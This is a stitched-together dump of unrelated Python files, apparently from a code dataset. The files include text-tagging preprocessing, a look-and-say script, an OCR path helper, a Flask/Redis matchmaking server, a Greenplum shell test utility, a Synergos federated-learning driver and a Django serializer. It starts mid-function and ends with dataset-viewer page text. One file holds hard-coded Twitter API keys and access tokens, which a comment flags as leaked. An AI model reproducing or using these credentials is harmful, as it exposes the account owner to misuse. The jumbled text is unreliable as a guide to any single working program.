                      for w, c in sorted(sent_vocab_dict.items(), key=lambda x: -x[1])
                      if c >= max_size]
    tag_vocab_cnt = sorted(tag_vocab_dict.items(), key=lambda x: -x[1])
    sent_vocab = [w for w, _ in sent_vocab_cnt]
    tag_vocab = [w for w, _ in tag_vocab_cnt]
    start_idx = 2  # indices 0 and 1 are reserved for <ukn>/<pad>
    sent_word2idx = dict((word, idx + start_idx) for idx, word in enumerate(sent_vocab))
    sent_word2idx['<ukn>'] = 0
    sent_word2idx['<pad>'] = 1
    sent_idx2word = dict((idx, word) for word, idx in sent_word2idx.items())
    tag_word2idx = dict((word, idx) for idx, word in enumerate(tag_vocab))
    tag_idx2word = dict((idx, word) for word, idx in tag_word2idx.items())
    # Out-of-vocabulary sentence words fall back to <ukn> (0).
    x = [[sent_word2idx.get(word, 0) for word in sentence.split()] for sentence in sent_line]
    y = [[tag_word2idx.get(word) for word in sentence.split()] for sentence in tag_line]
    return x, y, sent_word2idx, sent_idx2word, sent_vocab, tag_word2idx, tag_idx2word, tag_vocab
# load data with word dictionary
def load_data(in_file, zh_word2idx, en_word2idx):
    """Convert a tagged corpus file to index sequences using the supplied
    vocabularies.

    BUG FIX: the body previously ignored both vocabulary parameters and read
    the module-level globals sent_word2idx/tag_word2idx instead, so the
    function only worked when those globals happened to exist.

    Args:
        in_file: path; lines formatted "<tags> __content__ <sentence>".
        zh_word2idx: word -> index map for sentence words (0 = unknown).
        en_word2idx: tag -> index map (every tag must be present).

    Returns:
        (sent_line, tag_line): parallel lists of index lists.
    """
    sent_line, tag_line = [], []
    with open(in_file, 'r') as fin:
        for line in fin:
            sent_tag = line.split("__content__")
            sent_line.append(
                [zh_word2idx.get(word, 0) for word in sent_tag[1].strip().split()])
            tag_line.append(
                [en_word2idx[tta] for tta in sent_tag[0].strip().split()])
    return sent_line, tag_line
def data_padding(x, y, sent_word2idx, tag_word2idx, length=15):
    """In place: clip or right-pad each x[i] to exactly *length* tokens using
    the <pad> index, and convert each y[i] from a list of tag indices into a
    multi-hot vector over all known tags."""
    classes = len(tag_word2idx)
    pad_id = sent_word2idx['<pad>']
    for i, seq in enumerate(x):
        if len(seq) >= length:
            x[i] = seq[:length]
        else:
            x[i] = seq + [pad_id] * (length - len(seq))
        tag_vec = [0] * classes
        for tag in y[i]:
            tag_vec[tag] = 1
        y[i] = tag_vec
if __name__ == '__main__':
    # Build train vocabularies, index both splits, pad/multi-hot them,
    # echo the decoded training pairs, then persist everything.
    length = 30
    max_size = 4
    train_file = root + "datasets/text/wangke/train.txt"
    test_file = root + "datasets/text/wangke/test.txt"
    X_train, Y_train, sent_word2idx, sent_idx2word, sent_vocab, tag_word2idx, tag_idx2word, tag_vocab = create_dataset(
        train_file,max_size=max_size)
    X_test, Y_test = load_data(test_file, sent_word2idx, tag_word2idx)
    data_padding(X_train, Y_train, sent_word2idx, tag_word2idx, length=length)
    data_padding(X_test, Y_test, sent_word2idx, tag_word2idx, length=length)
    for sent, tag in zip(X_train, Y_train):
        print(" ".join([sent_idx2word[word] for word in sent]))
        # Recover the active tag indices from the multi-hot vector.
        ts = []
        for i, tta in enumerate(tag):
            if tta:
                ts.append(i)
        print(" ".join([tag_idx2word[ttaS] for ttaS in ts]))
    print("nb_trains: ",len(X_train))
    print("nb_tests: ",len(X_test))
    print("nb_classes: ",len(tag_vocab))
    # for key,tag in tag_idx2word.items():
    #     print key,tag
    # for x in X_train:
    #     print len(x)
    # NOTE(review): np.int is removed in modern NumPy (use int) — confirm
    # the pinned NumPy version before upgrading.
    X_train = np.asarray(X_train, dtype=np.int)
    Y_train = np.asarray(Y_train, dtype=np.int)
    X_test = np.asarray(X_test, dtype=np.int)
    Y_test = np.asarray(Y_test, dtype=np.int)
    # NOTE(review): np.save appends ".npy" when the target lacks it, so this
    # actually writes pack.npz.npy; the heterogeneous np.array also needs
    # dtype=object on recent NumPy — verify downstream readers.
    np.save(root + 'datasets/text/wangke/pack.npz', np.array([X_train, Y_train, X_test, Y_test,
                                                              sent_word2idx, sent_idx2word, sent_vocab, tag_word2idx,
                                                              tag_idx2word, tag_vocab]))
|
#!/usr/bin/env python3
# SECURITY: hard-coded Twitter API credentials checked into source; these
# should be loaded from the environment or a secrets store, and the leaked
# values revoked/rotated.
API_Key = "i3BgiDWeRDGgx1MieH5pfsQdI"
API_Secret = "W3tQRuhqBhYCm2PSezofEb0N069DNOT2r36LZzdAOQW29FdWwy"
# BUG FIX: `token: '...'` and `secret: '...'` were bare variable annotations
# that never assigned anything, so the names did not exist at runtime.
token = '616379578-w3ElYEoF40uO4GyW0KoMAnzM0SG9lhiWhVsY0aj3'
secret = 'nY86GsXMNmttcivMlYJ1iWnqFWhcBsWgLbFbdF5vln9Jz'
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# a0 a1 a2 a3 a4
# a = [1, 11, 21, 1211, 111221,
#1個の1
#2個の1
#1個の2,1個の1
#1個の1,1個の2、2個の1
#3個の1,2個の1,1個の1
from itertools import groupby
# 参考
# http://stackoverflow.com/questions/6972764/python-look-and-say-sequence-improved
def lookandsay(n):
    """Return the next look-and-say term: every run of equal digits in *n*
    is replaced by "<run length><digit>"."""
    parts = []
    for digit, run in groupby(n):
        parts.append(str(len(list(run))) + digit)
    return ''.join(parts)
# Print the length of the first 31 look-and-say terms.
# FIX: the Python-2 print statements are converted to print() calls, which
# produce the same space-separated output on both interpreters.
n = '1'
print("len(", 0, ")=", len(n))
for i in range(1, 31):
    n = lookandsay(n)
    print("len(", i, ")=", len(n))
|
# -*- coding: utf-8 -*-
"""
OCR 数据读入添加数据的绝对路径
@author: libo
"""
# Prefix every OCR label line with the absolute image directory and write
# the result to a new label file.
labelPath = 'D:/work_xinhuo/txt_add_path/txt/test.txt'
imgPath = 'D:/work_xinhuo/txt_add_path/img/'
labelPath2 = 'D:/work_xinhuo/txt_add_path/txt/test_add.txt'

# Read the label lines (trailing newlines are kept, so writelines below
# preserves the one-entry-per-line layout).
with open(labelPath, 'r', encoding='utf-8') as f:
    file_names = f.readlines()
print('-----------------', file_names[0:2])  # peek at the first two entries

file_names2 = [imgPath + strName for strName in file_names]

# BUG FIX: write with an explicit utf-8 encoding to match the read above;
# the platform default encoding can fail on non-ASCII label text.
with open(labelPath2, 'w', encoding='utf-8') as w:
    w.writelines(file_names2)
print('=================', file_names2)
from collections import OrderedDict
from pprint import pprint
from contextlib import contextmanager
import os
import pickle
from flask import Flask, request, abort, jsonify
from flask_cors import CORS
from werkzeug.exceptions import HTTPException
import dotenv
import redis
# Grab the .env values to use globably in this module if they are not already in the environment.
dotenv.load_dotenv()
# Required; a missing REDIS_URL raises KeyError at import time on purpose.
REDIS_URL = os.environ['REDIS_URL']
# Any non-empty value turns on queue debug printing in /match.
DEBUG = os.environ.get('DEBUG')
# Total stat points a player must distribute across FIELDS.
POOL = 30
FIELDS = ("attack", "defense", "hps", "speed")
app = Flask(__name__)
CORS(app, headers='Content-Type')
@app.route('/match', methods=['POST', 'OPTIONS'])
def match():
    """Matchmaking endpoint.

    POST a JSON stat block: the player is queued (once per id) and matched
    against the oldest queued entry with a different name.  Responds
    {'success': False} when no opponent is available or the queue lock
    could not be acquired; 422 on missing/invalid stats.
    """
    # Post your own stat to the queue if you haven't yet done so.
    # Grab the oldest post that is not your own and remove it.
    if request.method == 'OPTIONS':
        # CORS preflight: an empty 200 body is sufficient.
        return ""
    stats = request.json
    if not stats:
        abort(422, description='json required')
    stats = verify_and_intify(stats)
    if stats is None:
        abort(422, description='invalid stats')
    store = Store()
    with store.get_queue() as queue:
        if queue is None:
            # Redis lock could not be acquired within its timeout.
            return jsonify({'success': False})
        if queue.is_new(stats):
            queue.push(stats)
        if DEBUG:
            queue.print()
        opponent = queue.pop_opponent(stats['name'])
        store.store_queue(queue)
        if not opponent:
            return jsonify({'success': False})
        return jsonify({'success': True, 'villain': opponent})
def verify_and_intify(stats, fields=FIELDS):
    """Validate a posted stat block; return it with the stat fields converted
    to ints, or None when invalid.

    Rules: 'name' and 'id' must both be present (the queue keys entries on
    id and matches on name), every stat field must be a non-negative
    integer, the stats must sum to exactly POOL, and attack/hps must each
    be at least 1.
    """
    # BUG FIX: the original `and` only rejected requests missing BOTH keys,
    # but downstream code needs name AND id — either one missing is invalid.
    if "name" not in stats or "id" not in stats:
        return None
    if not all(f in stats for f in fields):
        return None
    # str() so JSON integers are accepted too (a raw int has no .isdigit(),
    # which previously raised AttributeError instead of returning None).
    if not all(str(stats[f]).isdigit() for f in fields):
        return None
    # the intify part
    for f in fields:
        stats[f] = int(stats[f])
    if not sum(stats[f] for f in fields) == POOL:
        return None
    if not all(stats[f] >= 0 for f in fields):
        return None
    if stats['attack'] < 1 or stats['hps'] < 1:
        return None
    return stats
@app.errorhandler(HTTPException)
def error_handler(error):
    """Render any HTTPException (e.g. the abort(422) calls above) as JSON
    with the matching status code."""
    return jsonify({
        'success': False,
        'description': error.description,
        'name': error.name,
        'status_code': error.code
    }), error.code
class Store:
    """Redis-backed persistence for the matchmaking Queue, guarded by a
    redis lock so concurrent requests cannot interleave queue updates."""
    def __init__(self):
        self.redis = redis.from_url(REDIS_URL)
    @contextmanager
    def get_queue(self):
        """Yield the unpickled Queue while holding the 'key' lock; yields
        None when the lock cannot be acquired within 1 second."""
        acquired = False
        try:
            lock = self.redis.lock('key', blocking_timeout=1)
            acquired = lock.acquire()
            if not acquired:
                queue = None
            else:
                # Create a new queue if it's not in the redis database
                pickled = self.redis.get('queue') or pickle.dumps(Queue())
                queue = pickle.loads(pickled)
            yield queue
        finally:
            if acquired:
                lock.release()
    def store_queue(self, queue):
        """Pickle the queue back to redis (caller should still hold the lock,
        i.e. be inside get_queue())."""
        self.redis.set('queue', pickle.dumps(queue))
class Queue:
    """FIFO matchmaking queue.

    ``data`` maps player id -> stat entry in insertion order; ``_used``
    remembers every id that has ever been queued so repeat posts are
    ignored by callers via is_new().
    """
    MAX_USED = 100
    MAX_QUEUE = 100
    def __init__(self):
        self.data = OrderedDict()
        self._used = set()
    def is_new(self, entry):
        """True when this player id has never been queued before."""
        return entry['id'] not in self._used
    def push(self, entry):
        """Queue an entry, bounding memory: evict the oldest entry once the
        queue exceeds MAX_QUEUE, and reset the seen-id set once it exceeds
        MAX_USED."""
        if len(self.data) > self.MAX_QUEUE:
            self.data.popitem(last=False)  # drop the oldest entry
        if len(self._used) > self.MAX_USED:
            self._used = set()
        key = entry['id']
        self.data[key] = entry
        self._used.add(key)
    def pop_opponent(self, name):
        """Remove and return the oldest entry whose name differs from
        *name*, or None when no such entry exists."""
        match_key = None
        for key, entry in self.data.items():
            if entry['name'] != name:
                match_key = key
                break
        if match_key is None:
            return None
        return self.data.pop(match_key)
    def print(self):
        """Dump queue contents for debugging."""
        print('data:')
        pprint(self.data)
        print('used:')
        pprint(self._used)
|
#!/usr/bin/env python
"""
------------------------------------------------------------------------------
COPYRIGHT: Copyright (c) 200x - 2010, Greenplum Inc. All rights reserved.
PURPOSE:
LAST MODIFIED:
------------------------------------------------------------------------------
"""
#disable deprecationwarnings
import warnings
warnings.simplefilter('ignore', DeprecationWarning)
import unittest, os, popen2, time, sys, getopt, StringIO, string, platform, datetime, subprocess
# Directory containing this test file, plus a helper to build sibling paths.
MYD = os.path.abspath(os.path.dirname(__file__))
mkpath = lambda *x: os.path.join(MYD, *x)
# Ensure MYD appears exactly once in sys.path, at the end.
if MYD in sys.path:
    sys.path.remove(MYD)
sys.path.append(MYD)
# ============================================================================
class Shell:
    """Thin helper around shell command execution used by the test harness."""

    def __init__(self):
        # Last command string handed to run(); useful when debugging failures.
        self.lastcmd = ''

    def run(self, cmd, oFile=None, mode='a', cmdtype="cmd"):
        """
        Run a shell command. Return (True, [result]) if OK, or (False, []) otherwise.
        @params cmd: The command to run at the shell.
                oFile: an optional output file the output is also written to.
                mode: What to do if the output file already exists: 'a' =
                      append; 'w' = write (passed straight to open()).
                cmdtype: unused; kept for backward compatibility.
        """
        self.lastcmd = cmd
        p = os.popen(self.lastcmd)
        ret = []
        fp = open(oFile, mode) if oFile else None
        try:
            for line in p:
                ret.append(line)
                if fp:
                    fp.write(line)
        finally:
            # popen.close() returns None on success, an exit status otherwise.
            rc = p.close()
            if fp:
                fp.close()
        return (not rc, ret)

    def killall(self, procname):
        """Kill every process named *procname* (pkill, falling back to killall;
        assumes pkill is on PATH)."""
        cmd = "bash -c 'pkill %s || killall %s' > /dev/null 2>&1" % (procname, procname)
        return self.run(cmd)

    def getFilePath(self, cmd, key="sql"):
        """Return the first whitespace-separated token of *cmd* containing
        *key* beyond position 2, or "cmd-error" when none matches."""
        for val in cmd.split(" "):
            if val.find(key, 2) > 0:
                return val
        return "cmd-error"

    # Run Shell execution with Timeout
    # Currently, it's checking only for PSQL. We should try to generalize for all shell
    def run_timeout(self, cmd, timeout=900, raiseError=True, getPstack=True):
        """Run *cmd* under a nominal timeout.

        NOTE: the timeout is currently forced to 0 (disabled) to help with
        filerep debugging, so the timeout branch is dormant.
        @param raiseError: raise GPTestError('GPTimeout') on timeout instead
               of returning (False, ["Timeout"]).
        @param getPstack: unused; kept for backward compatibility.
        """
        # To help with filerep debugging take the timeout out of picture
        timeout = 0
        # psql with an inline "-c" statement runs with no timeout at all.
        if (cmd.find("psql") >= 0 and cmd.find(" -c ") > 0):
            return self.run(cmd)
        process = subprocess.Popen(cmd, env=None, shell=True,
                                   executable='/bin/bash',
                                   stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        if timeout > 0:
            start = datetime.datetime.now()
            while process.poll() is None:
                time.sleep(0.1)
                now = datetime.datetime.now()
                if (now - start).seconds > timeout:
                    # SIGTERM rather than SIGKILL/SIGINT: lets the child
                    # shut down while still ending the run promptly.
                    process.terminate()
                    os.waitpid(process.pid, 0)
                    # Either surface the timeout as a test failure or hand
                    # it back for the caller to decide.
                    if raiseError:
                        raise GPTestError('GPTimeout')
                    return (False, ["Timeout"])
        # Drain stdout so long-running children are cleaned up properly.
        pmsg = process.communicate()[0]
        if process.returncode is None:
            process.terminate()
        return (True, [pmsg])

    def run_in_loop(self, cmd, loop=0, msg="Error in loop"):
        """
        Run *cmd* in a loop and stop on the first exception.
        @cmd: Command
        @loop: Loop count; 0 (the default) loops forever.
        @msg: Error message used when an iteration raises.

        BUG FIX: the original handler used Python-2 print syntax and called
        the nonexistent self.fail(); the traceback is now printed and a
        GPTestError(msg) raised so callers see the failure.
        """
        counter = 1
        try:
            while loop == 0 or counter <= loop:
                self.run(cmd)
                counter += 1
        except Exception:
            import traceback
            traceback.print_exc()
            raise GPTestError(msg)
# Module-level singleton shared by importers of this utility module.
shell = Shell()
|
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import logging
# Libs
# Custom
from .collaborations import CollaborationTask
from .projects import ProjectTask
from .experiments import ExperimentTask
from .runs import RunTask
from .participants import ParticipantTask
from .registrations import RegistrationTask
from .tags import TagTask
from .alignments import AlignmentTask
from .models import ModelTask
from .optimizations import OptimizationTask
from .validations import ValidationTask
from .predictions import PredictionTask
##################
# Configurations #
##################
###################################
# Task Interfacing Class - Driver #
###################################
class Driver:
    """Single abstraction layer bundling every Synergos TTP task interface.

    Attributes:
        host (str): IP where Synergos TTP are hosted at
        port (int): Port where Synergos TTP REST service is hosted on
        is_secured (bool): Toggles whether a secured connection is used
            (i.e. HTTPS if True, HTTP if False)
    """

    def __init__(self, host: str, port: int, is_secured: bool = False):
        self.host = host
        self.port = port
        self.is_secured = is_secured

    @property
    def address(self):
        """Base URL of the TTP REST service; scheme follows is_secured."""
        scheme = "https" if self.is_secured else "http"
        return f"{scheme}://{self.host}:{self.port}"

    @property
    def collaborations(self):
        """Task interface for collaboration operations."""
        return CollaborationTask(address=self.address)

    @property
    def projects(self):
        """Task interface for project operations."""
        return ProjectTask(address=self.address)

    @property
    def experiments(self):
        """Task interface for experiment operations."""
        return ExperimentTask(address=self.address)

    @property
    def runs(self):
        """Task interface for run operations."""
        return RunTask(address=self.address)

    @property
    def participants(self):
        """Task interface for participant operations."""
        return ParticipantTask(address=self.address)

    @property
    def registrations(self):
        """Task interface for registration operations."""
        return RegistrationTask(address=self.address)

    @property
    def tags(self):
        """Task interface for data-tag operations."""
        return TagTask(address=self.address)

    @property
    def alignments(self):
        """Task interface for alignment operations."""
        return AlignmentTask(address=self.address)

    @property
    def models(self):
        """Task interface for model-training operations."""
        return ModelTask(address=self.address)

    @property
    def optimizations(self):
        """Task interface for optimization operations."""
        return OptimizationTask(address=self.address)

    @property
    def validations(self):
        """Task interface for validation operations."""
        return ValidationTask(address=self.address)

    @property
    def predictions(self):
        """Task interface for prediction operations."""
        return PredictionTask(address=self.address)
if __name__ == "__main__":
    # End-to-end demo workflow.
    # NOTE(review): assumes a TTP REST service is reachable at 0.0.0.0:5000
    # and two participant containers at 172.17.0.2/3 — confirm before running.
    host = "0.0.0.0"
    port = 5000
    driver = Driver(host=host, port=port)
    # Create project
    driver.projects.create(
        project_id="test_project",
        action="classify",
        incentives={
            'tier_1': [],
            'tier_2': [],
            'tier_3': []
        }
    )
    # Create experiment
    driver.experiments.create(
        project_id="test_project",
        expt_id="test_experiment",
        model=[
            {
                "activation": "sigmoid",
                "is_input": True,
                "l_type": "Linear",
                "structure": {
                    "bias": True,
                    "in_features": 15, # Arbitrary, will replaced dynamically
                    "out_features": 1 # Arbitrary, will replaced dynamically
                }
            }
        ]
    )
    # driver.experiments.create(
    #     project_id="test_project",
    #     expt_id="test_experiment",
    #     model=[
    #         {
    #             "activation": "sigmoid",
    #             "is_input": True,
    #             "l_type": "Linear",
    #             "structure": {
    #                 "bias": True,
    #                 "in_features": 15,
    #                 "out_features": 1
    #             }
    #         }
    #     ]
    # )
    # Create run
    driver.runs.create(
        project_id="test_project",
        expt_id="test_experiment",
        run_id="test_run",
        rounds=2,
        epochs=1,
        base_lr=0.0005,
        max_lr=0.005,
        criterion="NLLLoss"#"BCELoss"
    )
    # Create participant(s)
    driver.participants.create(
        participant_id="test_participant_1",
        host='172.17.0.2',
        port=8020,
        f_port=5000,
        log_msgs=True,
        verbose=True
    )
    driver.participants.create(
        participant_id="test_participant_2",
        host='172.17.0.3',
        port=8020,
        f_port=5000,
        log_msgs=True,
        verbose=True
    )
    # Create registration(s)
    driver.registrations.create(
        project_id="test_project",
        participant_id="test_participant_1",
        role="guest"
    )
    driver.registrations.create(
        project_id="test_project",
        participant_id="test_participant_2",
        role="host"
    )
    # Create tag(s)
    driver.tags.create(
        project_id="test_project",
        participant_id="test_participant_1",
        train=[
            # ["non_iid_1"],
            # ["edge_test_missing_coecerable_vals"],
            ["edge_test_misalign"],
            ["edge_test_na_slices"]
        ],
        evaluate=[["iid_1"]]
    )
    driver.tags.create(
        project_id="test_project",
        participant_id="test_participant_2",
        train=[["non_iid_2"]]
    )
    # driver.tags.create(
    #     project_id="test_project",
    #     participant_id="test_participant_1",
    #     train=[['train']],
    #     evaluate=[["evaluate"]]
    # )
    # driver.tags.create(
    #     project_id="test_project",
    #     participant_id="test_participant_2",
    #     train=[['train']],
    #     evaluate=[["evaluate"]]
    # )
    # Create alignment(s)
    driver.alignments.create(project_id="test_project")
    # Create model(s)
    model_resp = driver.models.create(
        project_id="test_project",
        expt_id="test_experiment",
        run_id="test_run"
    )
    print(f"Model response: {model_resp}")
    # Perform validation(s)
    valid_resp = driver.validations.create(
        project_id="test_project",
        expt_id="test_experiment",
        run_id="test_run"
    )
    print(f"Validation response: {valid_resp}")
    # Perform prediction(s)
    pred_resp = driver.predictions.create(
        tags={"test_project": [["iid_1"]]},
        participant_id="test_participant_1",
        project_id="test_project",
        expt_id="test_experiment",
        run_id="test_run"
    )
    # # Perform prediction(s)
    # pred_resp = driver.predictions.create(
    #     tags={"test_project": [["predict"]]},
    #     participant_id="test_participant_1",
    #     project_id="test_project",
    #     expt_id="test_experiment",
    #     run_id="test_run"
    # )
    print(f"Prediction response: {pred_resp}")
# Read five values and report the two smallest.
# BUG FIXES vs the original:
#  * the first value was stored as a string (never converted to float);
#  * the fifth value was read but never appended to the list;
#  * the second-minimum was only updated when a new overall minimum arrived,
#    so a value falling between the two smallest was lost.
vet = []
n = float(input('Insira um valor no vetor (1)'))
vet.append(n)
for i in range(4):
    n = float(input('Insira um valor no vetor ({})' .format(i + 2)))
    vet.append(n)
ordenado = sorted(vet)
menor1, menor2 = ordenado[0], ordenado[1]
input('O menor número é {} e o segundo menor é {}' .format(menor1, menor2))
|
from rest_framework import serializers
from apps.authentication.models import CustomUser
from datetime import datetime, date
from apps.setup.models import MyFile
class MyFileSerializer(serializers.ModelSerializer):
    """Serializer for MyFile records: exposes every model field, with
    name/filepath/uuid mandatory on input and description/updated_by
    optional."""
    name = serializers.CharField(required=True)
    description = serializers.CharField(required=False)
    filepath = serializers.CharField(required=True)
    updated_by = serializers.CharField(required=False)
    uuid = serializers.UUIDField(required=True)
    class Meta:
        model = MyFile
        # NOTE: ('__all__') is just the string '__all__' (parentheses do not
        # make a tuple); DRF accepts this spelling.
        fields = ('__all__')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.